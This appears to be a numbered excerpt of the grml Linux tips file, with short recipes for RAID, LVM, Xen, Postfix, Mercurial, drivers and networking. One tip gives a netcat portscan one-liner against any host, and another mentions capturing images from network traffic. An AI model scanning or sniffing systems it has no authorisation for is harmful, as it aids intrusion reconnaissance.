1345 Scan a v4l device for TV stations:
1347 % scantv -c /dev/video0 -C /dev/vbi0 -o ~/.xawtv
1349 Then running xawtv should work:
1353 Run apt-get with timeout of 3 seconds:
1355 # apt-get -o acquire::http::timeout=3 update
1357 Debian GNU/Linux device driver check page
1359 % $BROWSER http://kmuto.jp/debian/hcl/index.cgi
1361 Use dd with status line:
1363 # dd if=/dev/ice conv=noerror,notrunc,sync | buffer -S 100k | dd of=/tmp/file
1365 Generate a 512k file of random data with status bar:
1367 % dd if=/dev/random bs=1024 count=512 | bar -s 512k -of ./random
1369 Install Grub instead of lilo on grml installation (grml2hd):
1374 adjust grub's configuration file menu.lst:
1375 # $EDITOR /boot/grub/menu.lst
1377 now install grub (usage example for /dev/sda1):
1382 Install Ubuntu using grml:
1384 See https://wiki.ubuntu.com/Installation/FromKnoppix
1386 Resize ext2 / ext3 partition:
1388 # tune2fs -O '^has_journal' /dev/iceX # disable journaling
1389 # fsck.ext2 -v -y -f /dev/iceX # check the filesystem
1390 # resize2fs -p /dev/iceX $SIZE # resize it (adjust $SIZE)
1391 # fdisk /dev/ice # adjust partition in partition table
1392 # fsck.ext2 -v -y -f /dev/iceX # check filesystem again
1393 # resize2fs -p /dev/iceX # resize it to maximum
1394 # tune2fs -j /dev/iceX # re-enable journal
1396 Tune ext2 / ext3 filesystem:
1398 Check partition first:
1400 # tune2fs -l /dev/iceX
1402 If you don't see dir_index in the list, then enable it:
1404 # tune2fs -O dir_index /dev/iceX
1406 Now run e2fsck with the -D option to have the directories optimized:
1408 # e2fsck -D /dev/iceX
1410 Notice: since e2fsprogs (1.39-1) filesystems are created with
1411 directory indexing and on-line resizing enabled by default.
1413 Search for printers via network:
1415 # pconf_detect -m NETWORK -i 192.168.0.1/24
1417 Mount a remote directory via webdav (e.g. Mediacenter of GMX):
1419 # mount -t davfs https://mediacenter.gmx.net/ /mnt/test
1421 System-Profiling using oprofile:
1426 # opcontrol --setup --no-vmlinux --event=CPU_CLK_UNHALTED:500000:0:1:1 --separate=library
1431 Now $DO_SOME_TASKS...
1434 # opcontrol --shutdown
1436 Then take a look at the reports using something like e.g.:
1437 # opreport -t 0.5 --exclude-dependent
1438 # opreport -t 0.5 /path/to/executable_to_check
1439 # opannotate -t 0.5 --source --assembly
1441 Install ATI's fglrx driver for Xorg / X.org:
1443 Usually there already exist drivers for the grml-system:
1444 # apt-get update ; apt-get install fglrx-driver fglrx-kernel-`uname -r`
1446 After installing adjust xorg.conf via running:
1447 # aticonfig --initial --input=/etc/X11/xorg.conf
1449 For more information take a look at http://wiki.grml.org/doku.php?id=ati
1451 Install nvidia driver for Xorg / X.org:
1453 Usually there already exist drivers for the grml-system:
1454 # apt-get update ; apt-get install nvidia-glx nvidia-kernel-`uname -r`
1456 Then switch from module nv to nvidia:
1458 # sed -i 's/Driver.*nv.*/Driver "nvidia"/' /etc/X11/xorg.conf
1460 glxgears - a GLX demo that draws three rotating gears
1462 To print frames per second (fps) use:
1463 % glxgears -printfps
1465 You forgot to boot with 'grml noeject noprompt' to avoid
1466 ejecting and prompting for CD removal when rebooting/halting
1477 If you want to avoid only the prompting part, run:
1485 Mount wikipedia local via fuse:
1487 Adjust configuration:
1488 % cat ~/.wikipediafs/config.xml
1491 <article-cache-time>300</article-cache-time>
1495 <dirname>wikipedia-de</dirname>
1496 <host>de.wikipedia.org</host>
1497 <basename>/w/index.php</basename>
1500 <dirname>wikipedia-en</dirname>
1501 <host>en.wikipedia.org</host>
1502 <basename>/w/index.php</basename>
1507 Mount it (/wiki must exist of course):
1508 % mount.wikipediafs /wiki
1509 % cat /wiki/wikipedia-en/Cat
1512 % fusermount -u /wiki
1514 Remote notification on X via osd (on screen display):
1516 Start osd_server.py at your local host (listens on port 1234 by default):
1519 Then login to a $REMOTEHOST
1520 % ssh -R 1234:localhost:1234 $REMOTEHOST
1522 Now send the text to your local display via running something like:
1523 % echo "text to send" | nc localhost 1234
1525 Very useful when you are waiting for a long running job
1526 but want to do something else in the meanwhile:
1528 % ./configure && make && echo "finished compiling" | netcat localhost 1234
1530 You can use this in external programs as well of course. Examples:
1532 Use osd in centericq:
1534 % cat ~/.centericq/external
1543 if [ -x /usr/bin/socat -a -x /bin/netcat ] ; then
1544 CONTACT_CUSTOM_NICK=$(cat ${CONTACT_INFODIR}/info | head -n 46 | tail -n 1)
1545 osd_msg="*** CenterICQ: new ${EVENT_NETWORK} ${EVENT_TYPE} from ${CONTACT_CUSTOM_NICK} ***"
1546 if echo | socat - TCP4:localhost:1234 &>/dev/null ; then
1547 echo "${osd_msg}" | netcat localhost 1234
1551 Use it in the IRC console client irssi via running:
1555 You can even activate the port forwarding by default globally:
1560 RemoteForward 1234 127.0.0.1:1234
1563 Notice: if you get 'ABORT: Requested font not found' make sure the
1564 requested font is available, running 'LANG=C LC_ALL=C osd_server.py...'
1567 Avoid automatical startup of init scripts via invoke-rc.d:
1569 First of all make sure the package policyrcd-script-zg2 (which
1570 provides the /usr/sbin/policy-rc.d interface) is installed.
1572 In policyrcd-script-zg2's configuration file named
1573 /etc/zg-policy-rc.d.conf the script /usr/sbin/grml-policy-rc.d is
1574 defined as the interface for handling invoke-rc.d's startup policy.
1576 grml-policy-rc.d can be configure via /etc/policy-rc.d.conf. By
1577 default you won't notice any differences to Debian's default
1578 behaviour, except that invoke-rc.d won't be executed if a chroot has
1579 been detected (detection: /proc is missing).
1581 If you want to disable automatical startup of newly installed packages
1582 (done via the invoke-rc.d mechanism) just set EXITSTATUS to '101' in
1583 /etc/policy-rc.d.conf.
1585 To restore the default behaviour set EXITSTATUS back to '0' in
1586 /etc/policy-rc.d.conf.
1588 Install VMware-Tools for grml:
1590 First of all make sure a CD-ROM device in VMware is available.
1592 Mount the CD-ROM device to /mnt/cdrom, then unpack and install
1596 unp /mnt/cdrom/vmware-linux-tools.tar.gz
1597 cd vmware-tools-distrib
1600 /etc/init.d/networking stop
1605 /etc/init.d/networking start
1607 In an X terminal, launch the VMware Tools running:
1611 Some important Postfix stuff
1619 Send all messages in the queue:
1623 Send all messages in the queue for a specific site:
1627 Delete a specific message
1628 # postsuper -d 12345678942
1630 Deletes all messages held in the queue for later delivery
1631 # postsuper -d ALL deferred
1633 Mail queues in postfix:
1635 incoming -> mail who just entered the system
1636 active -> mail to be delivered
1637 deferred -> mail to be delivered later because there were problems
1638 hold -> mail that should not be delivered until released from hold
1640 For configuration of postfix take a look at
1641 /etc/postfix/master.cf - man 5 master
1642 /etc/postfix/main.cf - man 5 postconf
1643 and http://www.postfix.org/documentation.html.
1647 mode 4000 - set user ID (suid):
1649 - for executable files: run as the user who owns the file, instead of the
1650 user who runs the file
1651 - for directories: not used
1653 mode 2000 - set group ID (guid):
1655 - for executable files: run as the group who owns the file, instead of the
1656 group of the user who runs the file
1657 - for directories: when a file is created inside the directory, it belongs
1658 to the group of the directory instead of the default group of the user who
1661 mode 1000 - sticky bit:
1663 - for files: not used
1664 - for directories: only the owner of a file can delete or rename the file
1666 Create MySQL database
1668 # apt-get install mysql-client mysql-server
1670 Run 'mysql' as root - create a database with:
1672 create database grml
1674 Give a user access to the database (without password):
1676 grant all on grml.* to mika;
1678 Give a user access to the database (with password):
1680 grant all on grml.* to enrico identified by "PASSWORD";
1682 Setup an HTTPS website:
1684 Create a certificate:
1686 # mkdir /etc/apache2/ssl
1687 # make-ssl-cert /usr/share/ssl-cert/ssleay.cnf /etc/apache2/ssl/apache.pem
1689 Create a virtual host on port 443:
1691 <VirtualHost www.foo.invalid:443>
1695 Enable SSL in the VirtualHost:
1698 SSLCertificateFile /etc/apache2/ssl/apache.pem
1700 Enable listening on the HTTPS port (/etc/apache2/ports.conf):
1704 and make sure the SSL module is used:
1708 Useful Apache / Apache2 stuff
1710 Check configuration file via running:
1712 # apache2ctl configtest
1720 # a2enmod modulename
1722 Create tar archive and store it on remote machine:
1724 % tar zcf - /sourcedir | ssh user@targethost "cat >file.tgz"
1726 Pick out and displays images from network traffic:
1730 Install Flash plugin:
1732 # dpkg-reconfigure flashplugin-nonfree
1734 To test a proxy, low level way:
1738 GET http://www.google.com HTTP/1.0 [press enter twice]
1740 Adjust system for use of qemu with kqemu:
1742 Make sure you have all you need:
1743 # aptitude update ; aptitude install qemu kqemu-modules-$(uname -r)
1748 mknod /dev/kqemu c 250 0
1749 chmod 666 /dev/kqemu
1750 chmod 666 /dev/net/tun
1752 Check kqemu support via starting qemu, press
1753 Ctrl-Alt-2 and entering 'info kqemu'.
1755 (High-Load) Debugging related tools:
1757 mpstat # report processors related statistics
1758 iostat # report CPU statistics and input/output statistics for devices and partitions
1759 vmstat # report virtual memory statistics
1760 slabtop # display kernel slab cache information in real time
1761 atsar # system activity report
1762 dstat # versatile tool for generating system resource statistics
1773 Using WPA for network setup manually:
1775 # wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf
1777 Adjust the options and configuration file to your needs.
1778 Also take a look at 'grml-network'.
1780 Start X and lock console via exiting:
1782 % startx 2>~/.xsession-errors &| exit
1784 Which process is writing to disk and/or causes the disk to spin up?
1786 First of all use lsof to check what's going on. Does not help? ->
1788 # echo 1 > /proc/sys/vm/block_dump
1790 The command sets a sysctl to cause the kernel to log all disk
1791 writes. Please notice that there is a lot of data. So please
1792 disable syslogd/syslog-ng before you do this, or you must make
1793 sure that kernel output is not logged.
1795 When you're done, disable block dump using:
1796 # echo 0 > /proc/sys/vm/block_dump
1799 laptop-mode-tools provides a tool named lm-profiler (laptop mode profiler)
1800 which handles block_dump on its own.
1802 See: $KERNEL-SOURCE/Documentation/laptop-mode.txt
1804 Also take a look at event-viewer(8) which is part of grml-debugtools.
1806 Install initrd via initramfs-tools for currently running kernel:
1808 # update-initramfs -c -t -k $(uname -r)
1810 Install initrd via yaird for currently running kernel:
1812 # yaird -o /boot/initrd.img-$(uname -r)
1814 Install initrd via yaird for specific kernel:
1818 # yaird -o /boot/initrd.img-2.6.15-1-686 2.6.15-1-686
1820 Reinstall package with its original configuration files:
1822 # apt-get install --reinstall -o DPkg::Options::=--force-confmiss -o \
1823 DPkg::Options::=--force-confnew package
1825 grml 0.8 funkenzutzler - rt2x00 drivers:
1827 To avoid conflicts with the other rt2x00-drivers the package rt2x00 (which
1828 includes beta-version drivers) is not installed by default. If you want to
1829 use the kernel modules rt2400pci, rt2500pci, rt2500usb, rt61pci and/or
1830 rt73usb please install the package manually running:
1832 # dpkg -i /usr/src/rt2x00-modules-*.deb
1834 Use Java with jikes and jamvm on grml:
1838 % cp /usr/share/doc/grml-templates/template.java .
1839 % jikes template.java
1842 Notice that grml exports $JIKESPATH (/usr/share/classpath/glibj.zip),
1843 so you do not have to manually run
1844 jikes --bootclasspath /usr/share/classpath/glibj.zip
1846 Online resizing of (Software-)RAID5:
1848 # Initiate a RAID5 setup for testing purposes:
1849 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/hda1 /dev/hdb1 /dev/hdd1
1851 # Create filesystem, mount md0, create a testfile and save md5sum for
1854 mount /dev/md0 /mnt/test
1855 dd if=/dev/urandom of=/mnt/test/dd bs=512 count=10000
1856 md5sum /mnt/test/dd > md5sum
1858 # Make sure the RAID is synched via checking:
1861 # Now remove one partition:
1862 mdadm /dev/md0 --fail /dev/hdd1 --remove /dev/hdd1
1864 # Delete partition, create a new + bigger one and set partition type to fd
1865 # (Linux raid autodetect):
1868 # And re-add the partition:
1869 mdadm -a /dev/md0 /dev/hdd1
1871 # Make sure the RAID is synched via checking:
1874 # Repeat the steps for all other disks/partitions as well:
1875 mdadm /dev/md0 --fail /dev/hdb1 --remove /dev/hdb1
1877 mdadm -a /dev/md0 /dev/hdb1
1879 mdadm /dev/md0 --fail /dev/hda1 --remove /dev/hda1
1881 mdadm -a /dev/md0 /dev/hda1
1884 # Now resize the RAID5 system online [see 'man mdadm' for details]:
1885 mdadm --detail /dev/md0 | grep -e 'Array Size' -e 'Device Size'
1886 mdadm --grow /dev/md0 -z max
1887 mdadm --detail /dev/md0 | grep -e "Array Size" -e 'Device Size'
1889 # Last step - resize the filesystem (online again):
1892 ext3 online resizing:
1894 Starting with Linux kernel 2.6.10 you can resize ext3 online. With
1895 e2fsprogs >=1.39-1 new filesystems are created with directory indexing and
1896 on-line resizing enabled by default (see /etc/mke2fs.conf).
1900 cfdisk /dev/hda # create a partition with type 8e (lvm)
1901 pvcreate /dev/hda2 # create a physical volume
1902 vgcreate resize_me /dev/hda2 # create volume group
1903 lvcreate -n resize_me -L100 resize_me # create a logical volume
1904 mkfs.ext3 /dev/resize_me/resize_me # now create a new filesystem
1905 mount /dev/resize_me/resize_me /mnt/test # mount the new fs for demonstrating online resizing
1906 df -h # check the size of the partition
1907 lvextend -L+100M /dev/resize_me/resize_me # let's extend the logical volume
1908 resize2fs /dev/resize_me/resize_me # and finally resize the filesystem
1909 df -h # recheck the size of the partition
1911 This also works for Software-RAID. Demo:
1913 mdadm --create --verbose /dev/md0 --level=raid1 --raid-devices=2 /dev/hda2 /dev/hdb1
1915 mount /dev/md0 /mnt/test
1916 mdadm /dev/md0 --fail /dev/hda2 --remove /dev/hda2
1917 cfdisk /dev/hda # adjust partition size for hda2
1918 mdadm /dev/md0 --add /dev/hda2
1919 mdadm /dev/md0 --fail /dev/hdb1 --remove /dev/hdb1
1920 cfdisk /dev/hdb # adjust partition size for hdb1
1921 mdadm /dev/md0 --add /dev/hdb1
1922 mdadm --grow /dev/md0 --size=max
1925 Notice: online resizing works as soon as the kernel can re-read the
1926 partition table. So it works for example with LVM and SW-RAID but not with
1927 a plain device (/dev/[sh]d*). The kernel does not re-read the partition
1928 table if the device is already mounted.
1930 Use vim as an outline editor:
1932 % $PAGER /usr/share/doc/vim-vimoutliner/README.Debian
1936 Monitor directories/files for changes using iwatch
1938 Monitor /tmp for changes:
1941 Monitor files/directories specified in /etc/iwatch.xml
1942 and send mail on changes:
1945 Some often used mdadm commands:
1948 # mdadm --create --verbose /dev/md0 --level=raid1 --raid-devices=2 /dev/hda1 /dev/hdb1
1950 Display details of specific RAID:
1951 # mdadm --detail /dev/md0
1954 Simulating a drive failure by software:
1955 # mdadm --manage --set-faulty /dev/md0 /dev/hda1
1957 Remove disk from RAID:
1958 # mdadm /dev/md0 -r /dev/hda1
1960 Set disk as faulty and remove from RAID:
1961 # mdadm /dev/md0 --fail /dev/hda1 --remove /dev/hda1
1966 Restart a RAID-device:
1969 Add another disk to existing RAID setup (hotadd):
1970 # mdadm /dev/md0 -a /dev/hde1
1971 # mdadm --grow /dev/md0 --raid-devices=4
1973 Assemble and start all arrays:
1974 # mdadm --assemble --scan
1976 Assemble a specific array:
1977 # mdadm --assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sdc1
1980 # mdadm --assemble --run --force --update=resync /dev/md0 /dev/sda1 /dev/sda2
1983 # mdadm --stop --scan
1985 Scan for and setup arrays automatically:
1986 # mdadm --assemble --scan --auto=yes --verbose
1988 Notice: If the above does not work make sure /etc/mdadm/mdadm.conf contains:
1990 CREATE owner=root group=disk mode=0660 auto=yes
1995 # /usr/share/mdadm/mkconf > /etc/mdadm/mdadm.conf
1998 Monitoring the sw raid
1999 # nohup mdadm --monitor --mail=root@localhost --delay=300 /dev/md0
2001 Producing /etc/mdadm/mdadm.conf:
2002 # mdadm --detail --scan > /etc/mdadm/mdadm.conf
2004 See also: man mdadm | less -p "^EXAMPLES"
2005 http://www.tldp.org/HOWTO/Software-RAID-HOWTO.html
2007 A quick summary of the most commonly used RAID levels:
2010 => 2 disks each 160 GB: 320 GB data
2011 RAID 1: Mirrored Set
2012 => 2 disks each 160 GB: 160 GB data
2013 RAID 5: Striped Set with Parity
2014 => 3 disks each 160 GB: 320 GB data; 160 GB redundancy
2016 Common nested RAID levels:
2017 RAID 01: A mirror of stripes
2018 RAID 10: A stripe of mirrors
2019 RAID 30: A stripe across dedicated parity RAID systems
2020 RAID 100: A stripe of a stripe of mirrors
2022 -- http://en.wikipedia.org/wiki/RAID
2024 Logical Volume Management (LVM) with Linux
2029 | hda1 hdc1 (PV:s on partitions or whole disks)
2035 | usrlv rootlv varlv (LV:s)
2037 | ext3 ext3 xfs (filesystems)
2039 Often used commands:
2040 ~~~~~~~~~~~~~~~~~~~~
2042 Create a physical volume:
2043 # pvcreate /dev/hda2
2045 Create a volume group:
2046 # vgcreate testvg /dev/hda2
2048 Create a logical volume:
2049 # lvcreate -n test_lv -L100 testvg
2051 Resize a logical volume:
2052 # lvextend -L+100M /dev/resize_me/resize_me
2053 # resize2fs /dev/resize_me/resize_me # ext2/3
2054 # xfs_growfs /dev/resize_me/resize_me # xfs
2055 # resize_reiserfs -f /dev/resize_me/resize_me # reiserfs online
2056 # mount -o remount,resize /dev/resize_me/resize_me # jfs
2058 Create a snapshot of a logical volume:
2059 # lvcreate -L 500M --snapshot -n mysnap /dev/testvg/test_lv
2061 Deactivate a volume group:
2062 # vgchange -a n my_volume_group
2064 Actually remove a volume group:
2065 # vgremove my_volume_group
2067 Display information about physical volume:
2068 # pvdisplay /dev/hda1
2070 Remove physical volume:
2071 # vgreduce my_volume_group /dev/hda1
2073 Remove logical volume:
2074 # umount /dev/myvg/homevol
2075 # lvremove /dev/myvg/homevol
2078 http://www.tldp.org/HOWTO/LVM-HOWTO/
2080 How to use APT locally
2082 Sometimes you have lots of packages .deb that you would like to use APT to
2083 install so that the dependencies would be automatically solved. Solution:
2086 dpkg-scanpackages debs /dev/null | gzip > debs/Packages.gz
2087 echo " deb file:/root debs/" >> /etc/apt/sources.list
2088 dpkg-scansources debs | gzip > debs/Sources.gz
2089 echo " deb-src file:/root debs/" >> /etc/apt/sources.list
2091 See also: http://www.debian.org/doc/manuals/apt-howto/ch-basico.en.html
2093 Check filesystem's LABEL:
2096 # vol_id -l /dev/sda1
2098 ext2/3 without vol_id:
2099 # dumpe2fs /dev/sda1 | grep "Filesystem volume name"
2102 # xfs_admin -l /dev/sda1
2104 reiserfs without vol_id:
2105 # debugreiserfs /dev/sda1 | grep -i label
2108 # jfs_tune -l /dev/sda1 | grep -i label
2110 reiser4 without vol_id:
2111 # debugfs.reiser4 /dev/sda1 | grep -i label
2113 Check filesystem's UUID:
2116 # vol_id -u /dev/sda1
2118 ext2/3 without vol_id:
2119 # dumpe2fs /dev/sda1 | grep -i UUID
2122 # xfs_admin -u /dev/sda1
2124 reiserfs without vol_id:
2125 # debugreiserfs /dev/sda1 | grep -i UUID
2127 reiser4 without vol_id:
2128 # debugfs.reiser4 /dev/sda1 | grep -i UUID
2130 Change a filesystem's LABEL:
2133 # mkswap -L $LABEL /dev/sda1
2136 # e2label /dev/sda1 $LABEL
2137 # tune2fs -L $LABEL /dev/sda1
2140 # reiserfstune -l $LABEL /dev/sda1
2143 # jfs_tune -L $LABEL /dev/sda1
2146 # xfs_admin -L $LABEL /dev/sda1
2149 # echo 'drive i: file="/dev/sda1"' >> ~/.mtoolsrc
2150 # mlabel -s i:$LABEL
2153 # ntfslabel $LABEL /dev/sda1
2155 Disable pdiffs feature of APT:
2158 # echo 'Acquire::PDiffs "false";' >> /etc/apt/apt.conf
2161 # apt-get update -o Acquire::Pdiffs=false
2163 Backup big devices or files and create compressed splitted
2164 image chunks of it using zsplit
2166 Create backup of /dev/sda named archiveofsda_#.spl.zp in directory
2167 /mnt/sda1/backup, split the files up into chunks of 1GB each and set
2168 read/write buffer to 256kB:
2169 # zsplit -b 256 -N archiveofsda -o /mnt/sda1/backup/ -s 1G /dev/sda
2171 Restore the backup using unzsplit:
2172 # unzsplit -D /dev/sda -d archiveofsda
2174 More usage examples: man zsplit + man unzsplit
2176 Measure network performance using iperf:
2182 % iperf -c <server_address> -V
2186 Server with 128k TCP window size:
2189 Client with running for 60 seconds and bidirectional test:
2190 % iperf -c <server_address> -r -w128k -t60
2192 Framebuffer resolutions:
2194 Resolution in pixels
2195 Color depth | 640x480 800x600 1024x768 1280x1024
2196 256 (8bit)| 769 771 773 775
2197 32000 (15bit)| 784 787 790 793
2198 65000 (16bit)| 785 788 791 794
2199 16.7 Mill.(24bit)| 786 789 792 795
2203 Mode 0x0300: 640x400 (+640), 8 bits
2204 Mode 0x0301: 640x480 (+640), 8 bits
2205 Mode 0x0303: 800x600 (+800), 8 bits
2206 Mode 0x0303: 800x600 (+832), 8 bits
2207 Mode 0x0305: 1024x768 (+1024), 8 bits
2208 Mode 0x0307: 1280x1024 (+1280), 8 bits
2209 Mode 0x030e: 320x200 (+640), 16 bits
2210 Mode 0x030f: 320x200 (+1280), 24 bits
2211 Mode 0x0311: 640x480 (+1280), 16 bits
2212 Mode 0x0312: 640x480 (+2560), 24 bits
2213 Mode 0x0314: 800x600 (+1600), 16 bits
2214 Mode 0x0315: 800x600 (+3200), 24 bits
2215 Mode 0x0317: 1024x768 (+2048), 16 bits
2216 Mode 0x0318: 1024x768 (+4096), 24 bits
2217 Mode 0x031a: 1280x1024 (+2560), 16 bits
2218 Mode 0x031b: 1280x1024 (+5120), 24 bits
2219 Mode 0x0330: 320x200 (+320), 8 bits
2220 Mode 0x0331: 320x400 (+320), 8 bits
2221 Mode 0x0332: 320x400 (+640), 16 bits
2222 Mode 0x0333: 320x400 (+1280), 24 bits
2223 Mode 0x0334: 320x240 (+320), 8 bits
2224 Mode 0x0335: 320x240 (+640), 16 bits
2225 Mode 0x0336: 320x240 (+1280), 24 bits
2226 Mode 0x033c: 1400x1050 (+1408), 8 bits
2227 Mode 0x033d: 640x400 (+1280), 16 bits
2228 Mode 0x033e: 640x400 (+2560), 24 bits
2229 Mode 0x0345: 1600x1200 (+1600), 8 bits
2230 Mode 0x0346: 1600x1200 (+3200), 16 bits
2231 Mode 0x034d: 1400x1050 (+2816), 16 bits
2232 Mode 0x035c: 1400x1050 (+5632), 24 bits
2234 Portscan using netcat:
2236 # netcat -v -w2 <host|ip-addr.> 1-1024
2238 Run apt-get but disable apt-listchanges:
2240 APT_LISTCHANGES_FRONTEND=none apt-get ...
2242 Upgrade system but disable apt-listbugs:
2244 APT_LISTBUGS_FRONTEND=none apt-get ...
2246 Set up a Transparent Debian Proxy
2248 Install of apt-cacher, the default config will do:
2249 # apt-get install apt-cacher
2251 Check out the ip address of debian mirror(s).
2252 Then add this to your firewall script:
2254 DEBIAN_MIRRORS="141.76.2.4 213.129.232.18"
2255 for ip in ${DEBIAN_MIRRORS} ; do
2256 ${IPTABLES} -t nat -A PREROUTING -s $subnet -d $ip -p tcp --dport 80 -j REDIRECT --to-port 3142
2259 where ${IPTABLES} is the location of your iptables binary
2260 and $subnet is your internal subnet.
2262 Now everybody in your subnet who does access either
2263 ftp.de.debian.org or ftp.at.debian.org will actually
2264 access your apt-cacher instead.
2266 To use apt-cacher on the router itself, add the following
2267 line to your /etc/apt/apt.conf:
2269 Acquire::http::Proxy "http://localhost:3142/";
2271 Version control using Mercurial
2273 Setting up a Mercurial project:
2276 % hg init # creates .hg
2277 % hg add # add all files
2278 % hg commit # commit all changes, edit changelog entry
2280 Branching and merging:
2282 % hg clone linux linux-work # create a new branch
2287 % hg pull ../linux-work # pull changesets from linux-work
2288 % hg merge # merge the new tip from linux-work into
2289 # (old versions used "hg update -m" instead)
2290 # our working directory
2291 % hg commit # commit the result of the merge
2295 % cat ../p/patchlist | xargs hg import -p1 -b ../p
2303 % hg export 1234 > foo.patch # export changeset 1234
2305 Export your current repo via HTTP with browsable interface:
2307 % hg serve -n "My repo" -p 80
2309 Pushing changes to a remote repo with SSH:
2311 % hg push ssh://user@example.com/~/hg/
2313 Merge changes from a remote machine:
2315 host1% hg pull http://foo/
2316 host2% hg merge # merge changes into your working directory
2318 Set up a CGI server on your webserver:
2319 % cp hgwebdir.cgi ~/public_html/hg/index.cgi
2320 % $EDITOR ~/public_html/hg/index.cgi # adjust the defaults
2322 Mercurial repositories of grml can be found at http://hg.grml.org/
2324 Download binary codecs for mplayer:
2326 # /usr/share/mplayer/scripts/win32codecs.sh
2330 # /usr/share/mplayer/scripts/binary_codecs.sh install
2332 (depending on the mplayer version you have).
2334 To play encrypted DVDs and if you are living in a country where using
2335 libdvdcss code is not illegal can install Debian package libdvdread3
2336 and use the script /usr/share/doc/libdvdread3/install-css.sh.
2338 Read manpages of uninstalled packages with debman:
2340 % debman -p git-core git
2342 Test network performance using netperf:
2348 # netperf -t TCP_STREAM -H 192.168.0.41
2350 Setup Xen within 20 minutes on Debian/grml
2352 Install relevant software und update grub's menu.lst (Xen does not work with
2353 usual lilo so install grub instead if not done already):
2355 apt-get install linux-image-2.6.18-1-xen-686 xen-hypervisor-3.0.3-1-i386 \
2356 xen-utils-3.0.3-1 xen-tools bridge-utils
2359 Example for installation of Debian etch as DomU:
2362 xen-create-image --debootstrap --dir=/mnt/md1/xen --size=2Gb --memory=512Mb --fs=ext3 \
2363 --cache=yes --dist=etch --hostname=xengrml1 --ip 192.168.1.2 --netmask 255.255.255.0 \
2364 --gateway 192.168.1.1 --initrd=/boot/initrd.img-2.6.18-1-xen-686 \
2365 --kernel=/boot/vmlinuz-2.6.18-1-xen-686 --mirror=http://ftp.at.debian.org/debian/
2369 /etc/init.d/xend start
2370 /etc/init.d/xendomains start
2372 Setup a bridge for network, either manually:
2374 brctl addbr xenintbr
2375 brctl stp xenintbr off
2376 brctl sethello xenintbr 0
2377 brctl setfd xenintbr 0
2378 ifconfig xenintbr 192.168.1.1 netmask 255.255.255.0 up
2380 or via /etc/network/interfaces (run ifup xenintbr to bring up the device then
2384 iface xenintbr inet static
2385 pre-up brctl addbr xenintbr
2386 post-down brctl delbr xenintbr
2388 netmask 255.255.255.0
2393 Setup forwarding (adjust $PUBLIC_IP; for permanet setup use /etc/sysctl.conf and
2394 add the iptables commands to a startup script like /etc/init.d/rc.local):
2396 echo 1 > /proc/sys/net/ipv4/ip_forward
2397 iptables -t nat -A POSTROUTING -o eth0 -s 192.168.0.0/24 -j SNAT --to $PUBLIC_IP
2398 iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to $PUBLIC_IP
2400 Adjust network configuration of Xend:
2402 cat >> /etc/xen/xend-config.sxp << EOF
2403 (network-script network-route)
2404 (vif-bridge xenintbr)
2405 (vif-script vif-bridge)
2408 List domains, start up a DomU, shutdown later again:
2410 xm create -c /etc/xen/xengrml1.cfg
2414 This HowTo is also available online at http://grml.org/xen/
2416 Play tetris with zsh:
2420 bindkey "^Xt" tetris
2422 Now press 'ctrl-x t'.
2424 Set up a router with grml
2426 Run grml-router script:
2429 Install dnsmasq if not already present:
2430 # apt-get update ; apt-get install dnsmasq
2432 Adjust /etc/dnsmasq.conf according to your needs:
2433 # cat >> /etc/dnsmasq.conf << EOF
2436 dhcp-range=19.168.0.124,192.168.0.254,1m # dhcp range
2437 dhcp-option=3,192.168.0.1 # dns server
2438 dhcp-option=1,255.255.255.0 # netmask
2441 Start dnsmasq finally:
2444 Display stats about memory allocations performed by a program:
2446 Usage example for 'ls':
2448 % LD_PRELOAD=/lib/libmemusage.so ls > /dev/null
2450 Use KVM (Kernel-based Virtual Machine for Linux):
2452 Make sure to install the relevant tools:
2453 # apt-get update ; apt-get install kvm
2456 Test it with a minimal system like ttylinux:
2457 # wget http://www.minimalinux.org/ttylinux/packages/bootcd-i386-5.3.iso.gz
2458 # gzip -d bootcd-i386-5.3.iso.gz
2459 # kvm -cdrom bootcd-i386-5.3.iso
2461 EEPROM data decoding for SDRAM DIMM modules:
2464 # /usr/share/doc/lm-sensors/examples/eeprom/decode-dimms.pl
2468 Make sure your device is supported by Linux and running.
2469 See http://www.linuxtv.org/ for more details.
2471 If the DVB device works on your system (see 'hwinfo --usb'
2472 when using a DVB usb device for example), then make sure you
2473 have the scan util from dvb-utils available:
2475 # aptitude install dvb-utils
2477 Then create a channels.conf configuration file:
2479 % scan /usr/share/doc/dvb-utils/examples/scan/... > ~/.mplayer/channels.conf
2481 You can find some example configuration files on
2482 your grml system in ~/.channels. Usage example:
2484 % ln -s ~/.mplayer/channels.conf-AT-graz ~/.mplayer/channels.conf
2486 Tip: w_scan (see http://free.pages.at/wirbel4vdr/w_scan/index2.html)
2487 might be useful if you do not know the initial configuration
2490 Get the lastest mercurial snapshot:
2492 Make sure you have the python-dev package available:
2493 # apt-get update ; apt-get install python-dev
2495 Get and build the source:
2496 % hg clone http://selenic.com/repo/hg mercurial
2499 % export PYTHONPATH=$(pwd)
2500 % export PATH=$PATH:$(pwd)
2502 now you should have the newest version of mercurial whenever you execute hg.
2504 To update to the lastest development snapshot, additionally use
2505 the following commands:
2506 % hg pull -u http://hg.intevation.org/mercurial/crew
2512 Available bootoptions relevant in live-cd mode:
2513 -----------------------------------------------
2515 * utc: set UTC, if your system clock is set to UTC (GMT)
2516 * gmt: set UTC, if your system clock is set to UTC (GMT) [like bootoption utc]
2517 * tz=$option: set timezone to corresponding $option, usage example:
2520 Configuration options relevant on harddisk installation:
2521 --------------------------------------------------------
2523 * Use the tzconfig utility to set the local timezone:
2527 which adjusts /etc/timezone and /etc/localtime according
2528 to the provided information. Running:
2530 # dpkg-reconfigure tzdata
2532 might be useful as well.
2534 * /etc/default/rcS: set variable UTC according to your needs,
2535 whether your system clock is set to UTC (UTC='yes') or
2538 * /etc/localtime: adjust zoneinfo according to your needs:
2540 # ln -sf /usr/share/zoneinfo/$WHATEVER_YOU_WANT /etc/localtime
2542 The zoneinfo directory contains the time zone files that were
2543 compiled by zic. The files contain information such as rules
2544 about DST. They allow the kernel to convert UTC UNIX time into
2545 appropriate local dates and times. Use the zdump utility to
2546 print current time and date (in the specified time zone).
2548 * /etc/adjtime: This file is used e.g. by the adjtimex function,
2549 which can smoothly adjust system time while the system runs
2551 * If you change the time (using 'date --set ...', ntpdate,...)
2552 it is worth setting also the hardware clock to the correct time:
2554 # hwclock --systohc [--utc]
